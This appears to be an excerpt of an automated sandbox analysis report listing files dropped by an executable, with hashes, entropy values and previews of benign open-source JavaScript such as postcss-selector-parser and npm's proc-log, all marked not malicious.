              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _container = _interopRequireDefault(require("./container"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var Pseudo = /*#__PURE__*/function (_Container) {. _inheritsLoose(Pseudo, _Container);. function Pseudo(opts) {. var _this;. _this = _Container.call(this, opts) || this;. _this.type = _types.PSEUDO;. return _this;. }. var _proto = Pseudo.prototype;. _proto.toString = function toString() {. var params = this.length ? '('
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (317)
              Category:dropped
              Size (bytes):2146
              Entropy (8bit):4.795818445582559
              Encrypted:false
              SSDEEP:
              MD5:EFDA23D0CD77793C1F2D0E3FEEC15E2F
              SHA1:373ADF417443827984BB201A6D2D8BB199858F0E
              SHA-256:75161E1C4508296EBD7C1B14517806EE2B610397EBB156FB0F849AEA88113A1E
              SHA-512:C4DBB59667E15A685988DBF908B9475BDDF02CDF37B1F3BE95BCE4539AFABC4CD5DE51C71E6F3520122353B562536BAD3E94EB9C131C01790ADACEDD4AC90447
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _container = _interopRequireDefault(require("./container"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } }.function _createClass(Constructor, protoProps, staticProps) { if (protoProps) _defineProperties(Constructor.prototype, protoProps); if (staticProps) _defineProperties(Constructor, staticProps); Object.defineProperty(Constructor, "prototype", { writable: false }); return Constructor; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.cons
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1007
              Entropy (8bit):4.893596804050525
              Encrypted:false
              SSDEEP:
              MD5:300CBCC60228DCDE430A6418C31374BE
              SHA1:F5CE52DF726131B28CB77E53C5A720CB28C5D7B0
              SHA-256:EDEF837BDEF73DF4F9F5D60FBC731EB338EB3BFD43ADEB4E46E30F5FAB812BB8
              SHA-512:2E8F1D987586F52BD717DD0B6577B6368DD6D37AB89250751C48D15E50529D7E737D8680FA9A33D2F6831ADFC84F59B9BCB8D771C0FCEBE19971906A165FAE07
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _container = _interopRequireDefault(require("./container"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var Selector = /*#__PURE__*/function (_Container) {. _inheritsLoose(Selector, _Container);. function Selector(opts) {. var _this;. _this = _Container.call(this, opts) || this;. _this.type = _types.SELECTOR;. return _this;. }. return Selector;.}(_container["default"]);.exports["default"] = Selector;.module.exports = exports.d
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):965
              Entropy (8bit):4.951923652306818
              Encrypted:false
              SSDEEP:
              MD5:65AEE419B51584ACEFBF39F4C4E58AA2
              SHA1:2564D99AA319D047334CD59B1F7F9CEB54897205
              SHA-256:662B6AAF56F3D1723977593462687DBA15A20E599289D534BC60B26263F2F63E
              SHA-512:FAAF7E2BB24FF9A81B0EFF628D071801568F1E8D41BE417E22ADCD95E1802B996F772F85794799E0C3F17D506041664842E2350E6AFF2DEEAE278CFD4D3DF389
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _node = _interopRequireDefault(require("./node"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var String = /*#__PURE__*/function (_Node) {. _inheritsLoose(String, _Node);. function String(opts) {. var _this;. _this = _Node.call(this, opts) || this;. _this.type = _types.STRING;. return _this;. }. return String;.}(_node["default"]);.exports["default"] = String;.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):977
              Entropy (8bit):4.9570792386869424
              Encrypted:false
              SSDEEP:
              MD5:0F1BF13ABABC30447A6D9629ED93FD7F
              SHA1:8A5DAEE49E34396C293B24C2FF61A9830B8221B4
              SHA-256:C7C2AAD4E93696BF03DF2BC155B932356F8CAA7B9251C06BF55AD1015EE542BE
              SHA-512:45D9A6F0591F913E4A0F01B8390E68645D7861D0E3B1581F7FA90C17D57A3B5511A0C85912EA5EABD0B7B90039340A4E0AE25CBD80E9C249090356C53CAF9295
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _namespace = _interopRequireDefault(require("./namespace"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var Tag = /*#__PURE__*/function (_Namespace) {. _inheritsLoose(Tag, _Namespace);. function Tag(opts) {. var _this;. _this = _Namespace.call(this, opts) || this;. _this.type = _types.TAG;. return _this;. }. return Tag;.}(_namespace["default"]);.exports["default"] = Tag;.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):849
              Entropy (8bit):4.986509354137994
              Encrypted:false
              SSDEEP:
              MD5:C0871C9AD7CFEBB4E9B0FDD8B14741D6
              SHA1:55757DE255F7F6B8E470C841B72B4A5B6A15D101
              SHA-256:04B35CF17366457A619BC2392B0B3A14A4073503634C6AE7C4985EB83EF32646
              SHA-512:B62890397489764CE08D45D1CE2C5AB61B5BECAF14B27E4371D14A5777E2F2611FE55D32698465E59FFA6190A835D751A551754BBD3EC5885C5E934A2692736B
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports.UNIVERSAL = exports.TAG = exports.STRING = exports.SELECTOR = exports.ROOT = exports.PSEUDO = exports.NESTING = exports.ID = exports.COMMENT = exports.COMBINATOR = exports.CLASS = exports.ATTRIBUTE = void 0;.var TAG = 'tag';.exports.TAG = TAG;.var STRING = 'string';.exports.STRING = STRING;.var SELECTOR = 'selector';.exports.SELECTOR = SELECTOR;.var ROOT = 'root';.exports.ROOT = ROOT;.var PSEUDO = 'pseudo';.exports.PSEUDO = PSEUDO;.var NESTING = 'nesting';.exports.NESTING = NESTING;.var ID = 'id';.exports.ID = ID;.var COMMENT = 'comment';.exports.COMMENT = COMMENT;.var COMBINATOR = 'combinator';.exports.COMBINATOR = COMBINATOR;.var CLASS = 'class';.exports.CLASS = CLASS;.var ATTRIBUTE = 'attribute';.exports.ATTRIBUTE = ATTRIBUTE;.var UNIVERSAL = 'universal';.exports.UNIVERSAL = UNIVERSAL;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1036
              Entropy (8bit):4.967232470309054
              Encrypted:false
              SSDEEP:
              MD5:E1D95A4059017A3C8C9ECEF9C7D1247C
              SHA1:75A76DB492603DA6A288F32B895B82F27FE1950D
              SHA-256:20FCF271BBAA8415CD5849B75A23545C130E8AF629749696423F31C3F1243BA4
              SHA-512:949E08DC321B64346717C015054CB81B913F0D7112FB81D713DB67DBFCD3905F356D149CAFE928132FCB25F177759698EC414156E350B8041F22FCF53C4B0339
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = void 0;.var _namespace = _interopRequireDefault(require("./namespace"));.var _types = require("./types");.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }.function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; _setPrototypeOf(subClass, superClass); }.function _setPrototypeOf(o, p) { _setPrototypeOf = Object.setPrototypeOf ? Object.setPrototypeOf.bind() : function _setPrototypeOf(o, p) { o.__proto__ = p; return o; }; return _setPrototypeOf(o, p); }.var Universal = /*#__PURE__*/function (_Namespace) {. _inheritsLoose(Universal, _Namespace);. function Universal(opts) {. var _this;. _this = _Namespace.call(this, opts) || this;. _this.type = _types.UNIVERSAL;. _this.value = '*';. return _this;. }. return Universal;.}(_namespace["default"]);.exports["default"] = Universa
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):207
              Entropy (8bit):4.606442480339632
              Encrypted:false
              SSDEEP:
              MD5:F1D30CBCAFD595534D0CB8F9E48B498A
              SHA1:1B9C82F234F81800BF2276DB9574FEA0BFCE661B
              SHA-256:E0AB6D0C0199B9F58DD6E85A0C47BEB6CA9D2F58572E05E5B05E7DDE8A2C2D90
              SHA-512:FDA31D8795EEF162D7A8B0131983F52D3DAA48B0CD9B4D6BAB2598079B135CC23558C288104F31270945CC62B799191E8DC7B554EC29F9464036161D1D82F957
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = sortAscending;.function sortAscending(list) {. return list.sort(function (a, b) {. return a - b;. });.}.;.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (564)
              Category:dropped
              Size (bytes):2698
              Entropy (8bit):4.90538777950111
              Encrypted:false
              SSDEEP:
              MD5:D249464E7EFAE419822BF47E899F5828
              SHA1:1870E4DDD397FD08BF11E40973BF2845B0B014B6
              SHA-256:C7C064A928453297BE1EB09493E3714A65E2FE9B6CC96E194B19181819E518A2
              SHA-512:C9470CC1F1F0204A70CF7C0DD8E4944DD743263B4D6EB6FD41AF76AE631409238C6414DE36C8DC011B76F1A252100B4AA20D2DEEA70B906F3A211A1BCCC6DF92
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports.word = exports.tilde = exports.tab = exports.str = exports.space = exports.slash = exports.singleQuote = exports.semicolon = exports.plus = exports.pipe = exports.openSquare = exports.openParenthesis = exports.newline = exports.greaterThan = exports.feed = exports.equals = exports.doubleQuote = exports.dollar = exports.cr = exports.comment = exports.comma = exports.combinator = exports.colon = exports.closeSquare = exports.closeParenthesis = exports.caret = exports.bang = exports.backslash = exports.at = exports.asterisk = exports.ampersand = void 0;.var ampersand = 38; // `&`.charCodeAt(0);.exports.ampersand = ampersand;.var asterisk = 42; // `*`.charCodeAt(0);.exports.asterisk = asterisk;.var at = 64; // `@`.charCodeAt(0);.exports.at = at;.var comma = 44; // `,`.charCodeAt(0);.exports.comma = comma;.var colon = 58; // `:`.charCodeAt(0);.exports.colon = colon;.var semicolon = 59; // `;`.charCodeAt(0);.exports.semicolon = semicolon;.var
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (942)
              Category:dropped
              Size (bytes):8451
              Entropy (8bit):4.669140283354983
              Encrypted:false
              SSDEEP:
              MD5:D03EDD7F2DB9483EA099C247CF5AAB05
              SHA1:06199609CBA0562DED687732A8F805F7C6AFC016
              SHA-256:991E468856188DC5C5AB9177B21004EFE5E8825E8BB713DAE67A97BE6A044531
              SHA-512:B6227A19165F1279B5319CB5859F1A6ACE62577DC69B7D84BCF336CD9C76977F5047415270F61C7A195B028D8C10EB6ED459B2A07F76DB158AE9310CA75F1491
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports.FIELDS = void 0;.exports["default"] = tokenize;.var t = _interopRequireWildcard(require("./tokenTypes"));.var _unescapable, _wordDelimiters;.function _getRequireWildcardCache(nodeInterop) { if (typeof WeakMap !== "function") return null; var cacheBabelInterop = new WeakMap(); var cacheNodeInterop = new WeakMap(); return (_getRequireWildcardCache = function _getRequireWildcardCache(nodeInterop) { return nodeInterop ? cacheNodeInterop : cacheBabelInterop; })(nodeInterop); }.function _interopRequireWildcard(obj, nodeInterop) { if (!nodeInterop && obj && obj.__esModule) { return obj; } if (obj === null || typeof obj !== "object" && typeof obj !== "function") { return { "default": obj }; } var cache = _getRequireWildcardCache(nodeInterop); if (cache && cache.has(obj)) { return cache.get(obj); } var newObj = {}; var hasPropertyDescriptor = Object.defineProperty && Object.getOwnPropertyDescriptor; for (var key in obj) { if (key !== "default" &
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):431
              Entropy (8bit):4.815157669246628
              Encrypted:false
              SSDEEP:
              MD5:7D4CA0C5348BEC8FB423A4635434BA67
              SHA1:319A6A8796B00F9BCD2852220927DE85B2057B17
              SHA-256:5AEAA559248B7EC536BFAFC90C8115D89602C13AA060C016217CB80F64267922
              SHA-512:FE5D261AE8123A7A5E54F963F7211F1CFE19FF99EBB8C325ED218D54772524B0BE988E7A4D9853FF093BCF4884627B99BD749E35B3743AF367B92FC13040079F
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = ensureObject;.function ensureObject(obj) {. for (var _len = arguments.length, props = new Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {. props[_key - 1] = arguments[_key];. }. while (props.length > 0) {. var prop = props.shift();. if (!obj[prop]) {. obj[prop] = {};. }. obj = obj[prop];. }.}.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):437
              Entropy (8bit):4.780860910613772
              Encrypted:false
              SSDEEP:
              MD5:2F6E87C5A3922FC0953CCCFAC92B8D99
              SHA1:8788FFDC51CEED6AF171F80759413116FF4F20B3
              SHA-256:25FCACA0A0A2B58001FF4D48D84A34F5968E44634D0C8570EAA5A24619B2791C
              SHA-512:CFA04BEB3EBBF001B8559DCD8E78520536C7A4A583FC96A8976E39D104BB5A86CAE54A77E184DFD679A72FA77B16643692CF493DDB80334FF35C95E4C336D52E
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = getProp;.function getProp(obj) {. for (var _len = arguments.length, props = new Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {. props[_key - 1] = arguments[_key];. }. while (props.length > 0) {. var prop = props.shift();. if (!obj[prop]) {. return undefined;. }. obj = obj[prop];. }. return obj;.}.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):664
              Entropy (8bit):4.845143019548665
              Encrypted:false
              SSDEEP:
              MD5:64CAB9E0D1CA85A2F0F84972F6D6EB5F
              SHA1:6812E5ADD4765034047D50606328B4EF9F0FE57F
              SHA-256:9EE6469715AC691DFD876FA8A5C6AB9B53659801E80B5605526CD1440447FDF5
              SHA-512:0D2FED1DDF359686771D9992C46D03B22CA5F59FEA558B40C81C39DDBA319EB4FE5E775FA2A4B00D21FB42830A898C14757C6079F0B743DE86E3B544C793594F
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports.unesc = exports.stripComments = exports.getProp = exports.ensureObject = void 0;.var _unesc = _interopRequireDefault(require("./unesc"));.exports.unesc = _unesc["default"];.var _getProp = _interopRequireDefault(require("./getProp"));.exports.getProp = _getProp["default"];.var _ensureObject = _interopRequireDefault(require("./ensureObject"));.exports.ensureObject = _ensureObject["default"];.var _stripComments = _interopRequireDefault(require("./stripComments"));.exports.stripComments = _stripComments["default"];.function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; }
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):521
              Entropy (8bit):4.643867130701502
              Encrypted:false
              SSDEEP:
              MD5:19860FAFC0111E82EEED8D8EE3396357
              SHA1:E80F29D5ADDAB2288C731DDF572572996D754FA7
              SHA-256:DF7F5214AB78F15E5A95DFBF1C869C51CCF1871155958480E15EDAAA77D61B69
              SHA-512:133E2E432F81F29873538D1D93EF602009DF0737204D2764B5ACB6FF02FA2C506F907AE37BC8C77549747AA2182A23ECBC87D91D7A7E8FE728194191A26EF65B
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = stripComments;.function stripComments(str) {. var s = "";. var commentStart = str.indexOf("/*");. var lastEnd = 0;. while (commentStart >= 0) {. s = s + str.slice(lastEnd, commentStart);. var commentEnd = str.indexOf("*/", commentStart + 2);. if (commentEnd < 0) {. return s;. }. lastEnd = commentEnd + 2;. commentStart = str.indexOf("/*", lastEnd);. }. s = s + str.slice(lastEnd);. return s;.}.module.exports = exports.default;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2318
              Entropy (8bit):4.989493704900675
              Encrypted:false
              SSDEEP:
              MD5:434B5A2CEE3D4612D61D7ECFA9776899
              SHA1:156241F015722C7F3140D97D51E5D8CE3BF97219
              SHA-256:58D8E130F5F4B4944CFDFEE39DF8648EB69F6F2D18D0BB7172D4798E60B8A28A
              SHA-512:E115B9B7F9B7938DACB3507800F09D5C2A7DF5C8A41E7745C4BA1BE6E04D1F43664ABC30505D720A672B48185A6049C90AE72A06D7933257665A262936D77400
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..exports.__esModule = true;.exports["default"] = unesc;.// Many thanks for this post which made this migration much easier..// https://mathiasbynens.be/notes/css-escapes../**. * . * @param {string} str . * @returns {[string, number]|undefined}. */.function gobbleHex(str) {. var lower = str.toLowerCase();. var hex = '';. var spaceTerminated = false;. for (var i = 0; i < 6 && lower[i] !== undefined; i++) {. var code = lower.charCodeAt(i);. // check to see if we are dealing with a valid hex char [a-f|0-9]. var valid = code >= 97 && code <= 102 || code >= 48 && code <= 57;. // https://drafts.csswg.org/css-syntax/#consume-escaped-code-point. spaceTerminated = code === 32;. if (!valid) {. break;. }. hex += lower[i];. }. if (hex.length === 0) {. return undefined;. }. var codePoint = parseInt(hex, 16);. var isSurrogate = codePoint >= 0xD800 && codePoint <= 0xDFFF;. // Add special case for. // "If this number is zero, or is for a surrogat
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1971
              Entropy (8bit):4.763208983321619
              Encrypted:false
              SSDEEP:
              MD5:AC2A7785187FD78CB0A9A50DD15F564A
              SHA1:3B7DF8AD245D43B92804EFC5F7EB6F69E9061159
              SHA-256:CD32D85C549A7F16A562DCA88F26FCA3C38BE8F7EB78D7165400BFA0F424643D
              SHA-512:D20346780E8A7596682517C4F8A4E8EE5A3EB955355CF6F8D45068B5D9E72B53459C6C7828C8636EFD5D118B93387CDB7727F6F888C13C9608572239082CA59D
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "postcss-selector-parser",. "version": "6.0.13",. "devDependencies": {. "@babel/cli": "^7.11.6",. "@babel/core": "^7.11.6",. "@babel/eslint-parser": "^7.11.5",. "@babel/eslint-plugin": "^7.11.5",. "@babel/plugin-proposal-class-properties": "^7.10.4",. "@babel/preset-env": "^7.11.5",. "@babel/register": "^7.11.5",. "ava": "^5.1.0",. "babel-plugin-add-module-exports": "^1.0.4",. "coveralls": "^3.1.0",. "del-cli": "^5.0.0",. "eslint": "^8.28.0",. "eslint-plugin-import": "^2.26.0",. "glob": "^8.0.3",. "minimist": "^1.2.5",. "nyc": "^15.1.0",. "postcss": "^8.0.0",. "semver": "^7.3.2",. "typescript": "^4.0.3". },. "main": "dist/index.js",. "types": "postcss-selector-parser.d.ts",. "files": [. "API.md",. "CHANGELOG.md",. "LICENSE-MIT",. "dist",. "postcss-selector-parser.d.ts",. "!**/__tests__". ],. "scripts": {. "pretest": "eslint src && tsc --noEmit postcss-selector-parser.d.ts",. "prepare":
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):742
              Entropy (8bit):4.979221880771995
              Encrypted:false
              SSDEEP:
              MD5:FF3EBB073DC14DD12F0C142C96B3B04B
              SHA1:C3F5C7F37D0833769D9BB64475B3E589DBCA4010
              SHA-256:DC32A0DEE275E0A9AEFFBC974DBF4899A30DCDC2E5FFA8934AECB69261065864
              SHA-512:AF850AE7F90556236DFA625B26752630F4202BE779A8D16588A3552E422C53937CBA3C5E500AA9BF0DD201671E0C96156F09CF3E25DE60BB6C8A74ED9C679848
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) GitHub, Inc...Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):356
              Entropy (8bit):4.618954204589196
              Encrypted:false
              SSDEEP:
              MD5:DED50DBD03BC768D48CD0FBD1379610A
              SHA1:26038EF98DEA5A59D35B0E55E3FF866C78F697D9
              SHA-256:522A1BED143976DC543832A0FD61E766B39F9B5A2F72D03DA1647D6D0E28B81F
              SHA-512:14B4E9AC34E04A5FA8B019E1EB3C7BDEF3BE33269F638D3FC74C5F9A06BAA4CBD4CD6ABD9E7462288C4015C119C1AD4F12E4815AC25A823F7B6D21E48FEEE020
              Malicious:false
              Reputation:unknown
              Preview:// emits 'log' events on the process.const LEVELS = [. 'notice',. 'error',. 'warn',. 'info',. 'verbose',. 'http',. 'silly',. 'pause',. 'resume',.]..const log = level => (...args) => process.emit('log', level, ...args)..const logger = {}.for (const level of LEVELS) {. logger[level] = log(level).}..logger.LEVELS = LEVELS..module.exports = logger.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1062
              Entropy (8bit):4.6944573800951845
              Encrypted:false
              SSDEEP:
              MD5:90F166A31AB8602B150908E8FF47165B
              SHA1:F237E3D2D673A244B24B7D392F526FAD8944811F
              SHA-256:D3748DF26332CE2D7A0AD4C7180FA2621CD77E1255B9154398FF17D467569027
              SHA-512:A8EA0D063A3CBB7BC9F285B2045490D665BB6BBFD216F6BDAE646BC3F713E8D67BFFC8E531B111D37EF3FD0FEDEAB044F145700903BA9036D28A04DBC3839EF3
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "proc-log",. "version": "3.0.0",. "files": [. "bin/",. "lib/". ],. "main": "lib/index.js",. "description": "just emit 'log' events on the process object",. "repository": {. "type": "git",. "url": "https://github.com/npm/proc-log.git". },. "author": "GitHub Inc.",. "license": "ISC",. "scripts": {. "test": "tap",. "snap": "tap",. "posttest": "npm run lint",. "postsnap": "eslint index.js test/*.js --fix",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "template-oss-apply": "template-oss-apply --force". },. "devDependencies": {. "@npmcli/eslint-config": "^3.0.1",. "@npmcli/template-oss": "4.5.1",. "tap": "^16.0.1". },. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.5.1". },. "tap": {. "nyc-ar
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1098
              Entropy (8bit):5.1322616970659
              Encrypted:false
              SSDEEP:
              MD5:460A1C62FB575FC77668890EC8D03D0B
              SHA1:1433C1355CAE4A748820BA1862B32BB231AC04B6
              SHA-256:59A400D04C5078579ACC27DDD6452C1BDF763F9506E01364700935FBB1A7C91B
              SHA-512:C9DFF5F5700016F3FDC6A015D71002CE56B923A8F85877B764F9BECA9CB08D090E774F78BC17B96808A5C7A0D2D1AFD516207973ABA8B81317EA0AA7751372FC
              Malicious:false
              Reputation:unknown
              Preview:(The MIT License)..Copyright (c) 2013 Roman Shtylman <shtylman@gmail.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARIS
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5418
              Entropy (8bit):4.528904007474271
              Encrypted:false
              SSDEEP:
              MD5:1241DF6FB0CE96F21879078FF9A04B6C
              SHA1:015769D0C950757EF11A04033404E3D6EA739C58
              SHA-256:A199F9FDD8F0F94BE4BFE5407C4969D261AA6F080C372C1A359815DC6187F32C
              SHA-512:EFE6CA97F965D6155A494329F2C22CAD412FB98230E1552978811D640D7E9A4F98122E72F1DB23A77F9563828F76859A8137697A896907DC57D9BEF027597D40
              Malicious:false
              Reputation:unknown
              Preview:// shim for using process in browser.var process = module.exports = {};..// cached from whatever global is present so that test runners that stub it.// don't break things. But we need to wrap it in a try catch in case it is.// wrapped in strict mode code which doesn't define any globals. It's inside a.// function because try/catches deoptimize in certain engines...var cachedSetTimeout;.var cachedClearTimeout;..function defaultSetTimout() {. throw new Error('setTimeout has not been defined');.}.function defaultClearTimeout () {. throw new Error('clearTimeout has not been defined');.}.(function () {. try {. if (typeof setTimeout === 'function') {. cachedSetTimeout = setTimeout;. } else {. cachedSetTimeout = defaultSetTimout;. }. } catch (e) {. cachedSetTimeout = defaultSetTimout;. }. try {. if (typeof clearTimeout === 'function') {. cachedClearTimeout = clearTimeout;. } else {. cache
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):96
              Entropy (8bit):4.3640014246682215
              Encrypted:false
              SSDEEP:
              MD5:22CA56B0703B0C530A21D1E05DA421EE
              SHA1:0EB7B4E67705373ADEF4A706B1380F680D263C0B
              SHA-256:6D7FC57639A3DEB4B7CBD55EAFAE4D9E7B377873B9CE5E6A689E47711965912A
              SHA-512:754DBC40CF59259FEE5CD700687704A7A68BB066AF9F8A6E5F5D18E8D4AE8F7019A169CE58236B540A2C337324D81B3C45E73AFEFAD2FFAE22BE849D03CD064B
              Malicious:false
              Reputation:unknown
              Preview:// for now just expose the builtin process global from node.js.module.exports = global.process;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):609
              Entropy (8bit):4.727565727538948
              Encrypted:false
              SSDEEP:
              MD5:2BF721F92C10103D188FED1F8E4BDA8F
              SHA1:266A0CF0DA901A3BDD4AB76D0BA9032640455CA3
              SHA-256:8501B4909630E60C9E9F68C4CA8CCB1964688500E61C60408A26D5480A9DD3D4
              SHA-512:7EE0CCC414291A0B10E1E829E98A5F616FD0EEDB8F6919433474515BC33C6FF541E4036EF157F679F150AE93762CDC4ACE129322CDDFB86C1F5959F3151B8894
              Malicious:false
              Reputation:unknown
